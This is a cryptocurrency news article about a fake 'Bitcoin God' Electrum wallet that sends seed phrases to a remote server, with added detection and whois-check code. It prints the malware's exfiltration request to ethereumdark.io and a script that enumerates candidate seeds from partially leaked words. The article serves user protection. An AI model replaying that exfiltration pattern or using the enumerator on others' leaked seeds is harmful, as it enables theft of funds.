Reddit User Caught Bitcoin God Wallet Stealing Bitcoin Keys From Electrum

According to his post, Reddit user mimblezimble discovered that the Bitcoin God (GOD) wallet offered on electrumgod.org tries to steal your bitcoin (BTC) by transmitting your Electrum wallet’s seed phrase to a remote server. Steer clear of the Bitcoin GOD wallet.


Electrum God Wallet Has Built-In Devil Script That Steals Coins

Mimblezimble caught the electrumgod wallet red-handed trying to steal bitcoin keys. The user was careful enough not to install the suspect software on his main machine and used a virtual machine instead. Before installing the Electrum God wallet, he also disconnected the VM’s network adapter, leaving it without internet access, another smart move.

However, during installation the wallet crashed with the following Python error:

urllib3.exceptions.MaxRetryError:
HTTPConnectionPool(host='ethereumdark.io',
port=80): Max retries exceeded with url:
/electrum/seeds.php?seed=
wife+scar + free+royal+...+grey
(Caused by NewConnectionError('<urllib3.connection.HTTPConnection
object at 0x7fafcf62cb38>: Failed to establish a new connection:
[Errno -2] Name or service not known',))

As the post says, “it immediately tried to reach the ethereumdark.io site with a view on transmitting the electrum seed to the /electrum/seeds.php?seed={seed} script.”

Mimblezimble also describes how to reproduce the theft attempt on a VM with an empty (throwaway) Electrum seed, and adds this remark:

“REMARK: This should remind you that whatever else you do, you should NEVER allow the secrets to touch the network.

That is why it is so important to export the unsigned transaction to the network-disconnected signer (virtual) machine, sign the transaction there, and import the signed transaction back to the network-connected viewer (virtual) machine.

In that case, even if the wallet is subverted, corrupted, or infected, it will not be able to steal your secrets.”
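The failed request above is an HTTP GET with the entire seed phrase concatenated into the query string. The following added example (written for this page, not code from the Reddit post, the article, or any wallet) scans proxy or firewall log lines from an isolated test machine for exactly that shape: a query parameter or path segment that decodes to 12, 15, 18, 21 or 24 lowercase words. The log lines, their squid-like layout and the small word list are constructed for the demonstration; the mnemonic in them is the public BIP39 test vector, not anyone’s real seed. Without a word list the check is a heuristic and will also flag an ordinary twelve-word English sentence, which the sample deliberately includes; loading Electrum’s full english.txt (2048 words) removes that false positive.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Mnemonic lengths that BIP39 allows; Electrum's own seeds are normally 12 words.
MNEMONIC_LENGTHS = {12, 15, 18, 21, 24}
# Every word in the English Electrum/BIP39 list is 3 to 8 lowercase ASCII letters.
WORD_RE = re.compile(r"^[a-z]{3,8}$")

# Constructed proxy log (assumption: one URL per line, squid-like layout). The phrase
# in the first line is the public BIP39 test vector "legal winner ...", not a real seed.
SAMPLE_LOG = """\
1545264000.123 10.0.2.15 GET http://ethereumdark.io/electrum/seeds.php?seed=legal+winner+thank+year+wave+sausage+worth+useful+legal+winner+thank+yellow 200
1545264001.456 10.0.2.15 GET https://electrum.org/ 200
1545264002.789 10.0.2.15 GET http://example.com/search?q=how+to+restore+an+electrum+wallet 200
1545264003.012 10.0.2.15 GET http://example.com/search?q=the+quick+brown+fox+jumps+over+the+lazy+dog+near+the+river 200
"""

# Constructed stand-in for Electrum's english.txt (2048 words); a real deployment
# loads the full list so that ordinary English sentences are not flagged.
SMALL_WORDLIST = frozenset("legal winner thank year wave sausage worth useful yellow".split())


def looks_like_mnemonic(text, wordlist=None):
    """True if text is 12/15/18/21/24 lowercase words (all in wordlist, if one is given)."""
    words = text.split()
    if len(words) not in MNEMONIC_LENGTHS:
        return False
    if not all(WORD_RE.match(w) for w in words):
        return False
    return wordlist is None or all(w in wordlist for w in words)


def find_seed_leaks(log_text, wordlist=None):
    """Scan log lines for URLs carrying a mnemonic in a query parameter or a path segment."""
    findings = []
    for line in log_text.splitlines():
        url = next((f for f in line.split() if f.startswith(("http://", "https://"))), None)
        if url is None:
            continue
        parts = urlsplit(url)
        # parse_qsl turns both '+' and '%20' into spaces, which is how seeds.php?seed=a+b+c arrives.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if looks_like_mnemonic(value, wordlist):
                findings.append({"host": parts.hostname, "path": parts.path,
                                 "where": "query:" + name, "words": len(value.split())})
        # Some exfiltration puts the phrase in the path instead, e.g. /collect/word1%20word2%20...
        for segment in unquote(parts.path).split("/"):
            if looks_like_mnemonic(segment, wordlist):
                findings.append({"host": parts.hostname, "path": parts.path,
                                 "where": "path", "words": len(segment.split())})
    return findings


if __name__ == "__main__":
    for hit in find_seed_leaks(SAMPLE_LOG, SMALL_WORDLIST):
        print("possible seed exfiltration:", hit)
```

The same check can be applied before the VM is ever allowed online, by pointing the wallet at a local proxy that logs every request and refuses to forward it; an outbound request that carries a mnemonic is then the signal, whatever host it was aimed at.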

The God of Theft Hits Electrum’s Reputation Again

Electrum has earned an excellent reputation, and copycat wallets are now trading on it to lure newcomers into installing bad software. They also count on careless users who do not protect the wallet files kept in Electrum’s hidden data directory.


For example, there is an “Electron Cash wallet” for BCH that is closed source and carries the signature of a mysterious troll, Jonald Fyokball. Once installed and launched, this wallet tries to copy every wallet file stored in the original Electrum’s data directory.

Obviously, that means the wallet is after your private keys. It has been confirmed that it then tries the password you set for the BCH wallet against the copied BTC wallet files, betting that you reused it (a clever scheme, but not a foolproof one).

There is also a fresh campaign against Electrum and Electron Cash users that relies on attacker-controlled (command-and-control) Electrum servers: when a Windows client connects to one of them, the malicious server pushes a fake “security update” alert. Anyone who follows the link in that alert and installs the bogus update hands their bitcoin to the malware.

Take a look at the “Electrum Litecoin Wallet”, which is closed source and has no connection to the original Electrum developers. The only real Electrum wallet is for bitcoin only, and it can be downloaded from the official electrum.org website.

It carries the signature of Thomas Voegtlin, a respected figure and the author of Electrum.

A wallet for BITCOIN GOD. Which means: for you, of course.

Only Trust Established Or Hardware Wallets

When a new coin or token appears on the market, the temptation is to download whichever wallet is easiest to use. Sometimes it is open source, which is good, and sometimes it is closed source. That is where the problems start.

Even if the wallet is open source and does not steal your coins, it may still be too new to have been properly peer-reviewed, which brings its own risks for users. All too often, a freshly baked wallet turns out to be after your bitcoin, and that is far worse than annoyances such as Copay’s odd BCH address formats or Coinbase’s “bitcoin confiscability” feature. Do not trust online wallets, and if you want really tight private-key security, consider buying a CoolWallet S, TREZOR, OpenDime, Ledger, or KeepKey.

A Few Hints For Crypto Users

You may have noticed that the user Mimblezimble exposed a few of the words from his original seed in the error message he posted.

That was a risky move if coins are still on that seed: the Python error he posted reveals the first word of his seed, the last one, and a couple of others in between.

Electrum draws its seed words from a fixed list of 2048 words, so an attacker who already knows some of the words only has to search the remaining positions, and every further word that leaks shrinks that search by a factor of 2048. With most of the twelve words still unknown the search remains far beyond brute force, but it is a head start nobody should hand out.
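To put a number on that head start, here is an added example (not from the article or from Electrum’s code base) that reimplements Electrum’s seed-type check, an HMAC-SHA512 keyed with the string “Seed version” whose hex digest must start with “01” for a standard seed, and uses it to size the search an attacker faces. The known words are the ones visible in the error message above; the seven gaps, the tiny stand-in word list used by the enumerator, and the simplified normalisation (Electrum also strips accents and CJK spacing) are assumptions for the demonstration.

```python
import hashlib
import hmac
import itertools
import unicodedata

# Electrum (2.x and later) draws seed words from the 2048-word English list shared with BIP39.
WORDLIST_SIZE = 2048
# Electrum seed "version" prefixes: '01' standard, '100' segwit, '101' two-factor.
SEED_PREFIX_STANDARD = "01"


def normalize_seed(text):
    """Electrum normalizes NFKD, lowercases and collapses whitespace before hashing.
    (Simplified: Electrum also strips accents and CJK spacing, omitted here.)"""
    text = unicodedata.normalize("NFKD", text).lower()
    return " ".join(text.split())


def seed_version_digest(mnemonic):
    """Electrum's seed-type check hashes the phrase with HMAC-SHA512 keyed by b'Seed version'."""
    return hmac.new(b"Seed version", normalize_seed(mnemonic).encode("utf8"), hashlib.sha512).hexdigest()


def is_electrum_seed(mnemonic, prefix=SEED_PREFIX_STANDARD):
    """True if the phrase would be accepted as an Electrum seed of the given type."""
    return seed_version_digest(mnemonic).startswith(prefix)


def search_space(pattern, prefix=SEED_PREFIX_STANDARD):
    """pattern: known words in order, None for a position that did not leak.
    Returns (unknown positions, raw candidates, candidates surviving the version check)."""
    unknown = sum(1 for w in pattern if w is None)
    raw = WORDLIST_SIZE ** unknown
    # A prefix of n hex digits passes only one random phrase in 16**n.
    return unknown, raw, raw // (16 ** len(prefix))


def enumerate_candidates(pattern, wordlist, prefix=SEED_PREFIX_STANDARD):
    """The 'special script' itself: fill the unknown slots from wordlist and keep the
    phrases that pass the version check. Only practical when few positions are unknown."""
    slots = [i for i, w in enumerate(pattern) if w is None]
    for combo in itertools.product(wordlist, repeat=len(slots)):
        phrase = list(pattern)
        for i, w in zip(slots, combo):
            phrase[i] = w
        mnemonic = " ".join(phrase)
        if is_electrum_seed(mnemonic, prefix):
            yield mnemonic


# Pattern shaped like the leak in the error message: four words known at the start, one at
# the end, seven unknown (assumption: the gap count; the full seed is not on the page).
LEAKED_PATTERN = ["wife", "scar", "free", "royal"] + [None] * 7 + ["grey"]

if __name__ == "__main__":
    unknown, raw, surviving = search_space(LEAKED_PATTERN)
    print(f"{unknown} unknown words -> {raw:.3e} phrases, {surviving:.3e} after the version check")
```

With seven unknown positions the version check still leaves about 5.9e20 candidates, so the leak alone does not give the seed away; the point is that each further word cuts the remaining work by 2048, and the check costs one HMAC per candidate, so the enumerator becomes practical as soon as only two or three words are missing.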

If this user has since moved his coins to another seed, then everything is fine. Just in case, Bitsonline has reached out to him and asked him to hide his seed words or move the coins away from the old seed.

In any case, when downloading a new wallet, check:

  • Open or closed source? If closed, why?
  • Who wrote the software? A trusted developer, or some unknown person from nowhere?
  • Is there a public repository on GitHub, and has anyone reviewed the code?
  • How long did it take to deliver the software, and what is its business model?
  • Does it come from the core developers or from a separate or private entity?
  • Does it run anywhere other than a Windows PC?
  • How many reviews and how much feedback has the wallet collected across the web?
  • Are there supporting links to Twitter, Facebook, YouTube, Medium, or similar sites with educational content?

Pay Attention To The Official Page

Do not forget to take a quick look at the wallet’s website. It should link to GitHub, social profiles, Telegram chat rooms, and even email addresses with the full names of the software’s authors. Legitimate wallet developers rarely hide their identities.

Also check the “Creation Date” of the wallet’s official domain with a Whois lookup. If the domain was registered a month ago, and the hard fork happened three days before that, the wallet is not worth installing.
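The Whois check is easy to automate. The following added example (not from the article) parses the creation field out of a saved whois record and compares it with the date of the hard fork the wallet claims to serve, flagging domains registered after the fork or only shortly before it. The two whois records, the use of example.org, the dates and the fork date are constructed for the demonstration, and the set of field labels and date formats covers only the common registry layouts.

```python
import re
from datetime import datetime

# Constructed whois output in the ICANN-style layout (example.org is a reserved name; dates made up).
WHOIS_NEW = """\
Domain Name: EXAMPLE.ORG
Registrar: Example Registrar, Inc.
Updated Date: 2018-11-20T10:00:00Z
Creation Date: 2018-11-18T09:15:42Z
Registry Expiry Date: 2019-11-18T09:15:42Z
"""

# Constructed whois output in the terse ccTLD-style layout.
WHOIS_OLD = """\
domain:   example.org
created:  2012-05-01
changed:  2018-01-01
"""

# Registries label and format the creation field differently; cover the common spellings.
CREATION_FIELD = re.compile(
    r"^\s*(?:Creation Date|created|Registered on|Registration Date)\s*:\s*(.+?)\s*$",
    re.IGNORECASE | re.MULTILINE,
)
DATE_FORMATS = ("%Y-%m-%dT%H:%M:%SZ", "%Y-%m-%dT%H:%M:%S", "%Y-%m-%d", "%d-%b-%Y")


def creation_date(whois_text):
    """Extract the domain's creation timestamp from raw whois output."""
    match = CREATION_FIELD.search(whois_text)
    if not match:
        raise ValueError("no creation date in whois record")
    raw = match.group(1)
    for fmt in DATE_FORMATS:
        try:
            return datetime.strptime(raw, fmt)
        except ValueError:
            pass
    raise ValueError(f"unrecognised date format: {raw!r}")


def assess_domain(whois_text, fork_date, grace_days=30):
    """Return (created, days from fork to registration, suspicious).

    fork_date may be a datetime or a 'YYYY-MM-DD' string. Positive days means the domain
    appeared after the fork; anything registered after the fork, or less than grace_days
    before it, is flagged, since a wallet site that only sprang up around the fork has no
    track record to trust."""
    if isinstance(fork_date, str):
        fork_date = datetime.strptime(fork_date, "%Y-%m-%d")
    created = creation_date(whois_text)
    days_after_fork = (created - fork_date).days
    return created, days_after_fork, days_after_fork > -grace_days


if __name__ == "__main__":
    for label, record in (("new", WHOIS_NEW), ("old", WHOIS_OLD)):
        created, days, suspicious = assess_domain(record, "2018-11-15")
        print(f"{label}: created {created:%Y-%m-%d}, {days:+d} days from fork, suspicious={suspicious}")
```

Feed it the output of a plain `whois <domain>` run; the verdict is a prompt for more scrutiny, not proof of malice, since a legitimate project can register its domain late too.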

Keep your bitcoin safe and do not install untested software, even from the Google Play Store or Apple App Store. They publish untested software too.

Share your experience with the Electrum wallet or its clones. How did it go? Leave us tips and questions in the comments section below.


Images by Jeff Fawkes
